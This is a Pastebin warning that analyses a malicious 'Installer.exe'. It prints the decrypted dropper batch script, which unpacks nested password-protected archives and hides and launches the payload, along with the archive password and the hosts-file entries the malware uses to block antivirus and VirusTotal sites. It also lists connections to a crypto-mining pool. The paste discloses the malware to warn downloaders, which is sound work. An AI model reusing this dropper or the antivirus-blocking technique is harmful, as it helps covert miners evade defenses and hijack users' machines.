Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- xD
- DO NOT DOWNLOAD THIS, THIS IS A COMPLETE MALWARE.
- Proofs :
- Encrypted %temp%\main\main.bat :
- 挦獬敀档景൦洊摯㔶ㄬര琊瑩敬朠朳㐳㍧朴㐳㑧″㌨朴㐳㑧栵栶㕪樶㘵⥪摭攠瑸慲瑣摥敲楦敬戮湩映汩楺൰挊污稷攮數攠映汩楺⁰瀭㘲㠴ㄹ㈴㈰㐶㌹㈰㜷㔵㈴㜲㐸ⴠ敯瑸慲瑣摥ഠ昊牯⼠┥湩⠠ⰴㄭㄬ 潤⠠慣汬㜠硥硥牴捡整⽤楦敬╟椥種灩ⴠ敯瑸慲瑣摥ഩ爊湥映汩楺⁰楦敬戮湩摣攠瑸慲瑣摥潭敶∠湉瑳污敬硥≥⸠⼮摣⸮摲⼠焯攠瑸慲瑣摥瑡牴扩⬠⁈䤢獮慴汬牥攮數ഢ猊慴瑲∠•䤢獮慴汬牥攮數ഢ挊獬捥潨䰠畡据敨䤧獮慴汬牥攮數⸧慰獵搊汥⼠焯∠湉瑳污敬硥≥
- Decrypted %temp%\main\main.bat :
- cls
- @echo off
- mode 65 10
- title g3g34g34g34g43 (34g34g45h6hj56j56j)
- md extracted
- ren file.bin file.zip
- call 7z.exe e file.zip -p26489142026493027755422784 -oextracted
- for /l %%i in (4 -1 1) do (
- call 7z.exe e extracted/file_%%i.zip -oextracted
- )
- ren file.zip file.bin
- cd extracted
- move "Installer.exe" ../
- cd..
- rd /s /q extracted
- attrib +H "Installer.exe"
- start "" "Installer.exe"
- cls
- echo Launched 'Installer.exe'.
- pause
- del /f /q "Installer.exe"
- file.zip password : 26489142026493027755422784
- file.zip tree :
- C:.
- │ file_4.zip
- │
- └───file_4
- │ AntiAV.data
- │ file_3.zip
- │
- └───file_3
- │ file_2.zip
- │
- └───file_2
- │ file_1.zip
- │
- └───file_1
- Installer.exe
- Installer.exe Host File Changes :
- 0.0.0.0 avast.com
- 0.0.0.0 www.avast.com
- 0.0.0.0 totalav.com
- 0.0.0.0 www.totalav.com
- 0.0.0.0 scanguard.com
- 0.0.0.0 www.scanguard.com
- 0.0.0.0 totaladblock.com
- 0.0.0.0 www.totaladblock.com
- 0.0.0.0 pcprotect.com
- 0.0.0.0 www.pcprotect.com
- 0.0.0.0 mcafee.com
- 0.0.0.0 www.mcafee.com
- 0.0.0.0 bitdefender.com
- 0.0.0.0 www.bitdefender.com
- 0.0.0.0 us.norton.com
- 0.0.0.0 www.us.norton.com
- 0.0.0.0 avg.com
- 0.0.0.0 www.avg.com
- 0.0.0.0 malwarebytes.com
- 0.0.0.0 www.malwarebytes.com
- 0.0.0.0 pandasecurity.com
- 0.0.0.0 www.pandasecurity.com
- 0.0.0.0 surfshark.com
- 0.0.0.0 www.surfshark.com
- 0.0.0.0 avira.com
- 0.0.0.0 www.avira.com
- 0.0.0.0 norton.com
- 0.0.0.0 www.norton.com
- 0.0.0.0 eset.com
- 0.0.0.0 www.eset.com
- 0.0.0.0 zillya.com
- 0.0.0.0 www.zillya.com
- 0.0.0.0 kaspersky.com
- 0.0.0.0 www.kaspersky.com
- 0.0.0.0 usa.kaspersky.com
- 0.0.0.0 www.usa.kaspersky.com
- 0.0.0.0 dpbolvw.net
- 0.0.0.0 www.dpbolvw.net
- 0.0.0.0 sophos.com
- 0.0.0.0 www.sophos.com
- 0.0.0.0 home.sophos.com
- 0.0.0.0 www.home.sophos.com
- 0.0.0.0 www.adaware.com
- 0.0.0.0 adaware.com
- 0.0.0.0 www.ahnlab.com
- 0.0.0.0 ahnlab.com
- 0.0.0.0 www.bullguard.com
- 0.0.0.0 bullguard.com
- 0.0.0.0 clamav.net
- 0.0.0.0 www.clamav.net
- 0.0.0.0 www.drweb.com
- 0.0.0.0 drweb.com
- 0.0.0.0 emsisoft.com
- 0.0.0.0 www.emsisoft.com
- 0.0.0.0 www.f-secure.com
- 0.0.0.0 f-secure.com
- 0.0.0.0 www.zonealarm.com
- 0.0.0.0 zonealarm.com
- 0.0.0.0 www.trendmicro.com
- 0.0.0.0 trendmicro.com
- 0.0.0.0 www.ccleaner.com
- 0.0.0.0 ccleaner.com
- 0.0.0.0 www.virustotal.com
- 0.0.0.0 virustotal.com
- Installer.exe Virus Total : 52/70
- Internet Connections :
- 167.235.223.40:1123 | de.zephyr.herominers.com (Crypto Mining Malware website) - https://zephyr.herominers.com/
- 28.118.140.52.in-addr.arpa
- 240.221.184.93.in-addr.arpa
- 217.106.137.52.in-addr.arpa
- DNS Request
- de.zephyr.herominers.com
- DNS Response
- 167.235.223.40
- 40.223.235.167.in-addr.arpa
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
